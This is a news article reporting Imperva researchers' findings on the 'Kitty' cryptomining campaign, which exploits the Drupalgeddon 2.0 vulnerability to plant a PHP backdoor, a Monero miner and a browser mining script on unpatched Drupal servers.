Yet another bad actor has taken advantage of Drupal sites still vulnerable to “Drupalgeddon 2.0,” this time to mine cryptocurrency.
The bad script, dubbed the “Kitty” cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal (CVE-2018-7600) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.
Ransomware Attack Hits Ukrainian Energy Ministry, Exploiting Drupalgeddon2
Cryptominer Malware Threats Overtake Ransomware, Report Warns
Cryptomining Gold Rush: One Gang Rakes In $7M Over 6 Months
On servers, the attackers install a mining program – “kkworker” – which mines the xmrig (XMR) Monero cryptocurrency.
But the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.
“To win over kitty lovers’ hearts, the attacker cheekily asks to leave his malware alone by printing ‘me0w, don’t delete pls i am a harmless cute little kitty, me0w,’” the researchers said.
To make it all happen, the actors behind Kitty have used an open-source mining software for browsers called “webminerpool” to first write a bash script – in the form of a PHP file called kdrupal.php – on a server disc.
“In doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,” according to Imperva’s report.
Researchers said that while the PHP backdoor is “fairly light and simple,” it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker’s remote authentication.
Once this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.
Researchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.
Interestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.
“The first generation of the ‘Kitty malware’ we discovered was version 1.5, and the latest version is 1.6,” said the researchers. “This type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.”
Drupalgeddon 2.0, which has been patched for over a month now and impacts versions 6,7, and 8 of Drupal’s CMS platform, “potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,” according to MITRE’s Common Vulnerabilities and Exposures bulletin back on March 28.
Since Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.
That includes a botnet, dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a ransomware attack hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.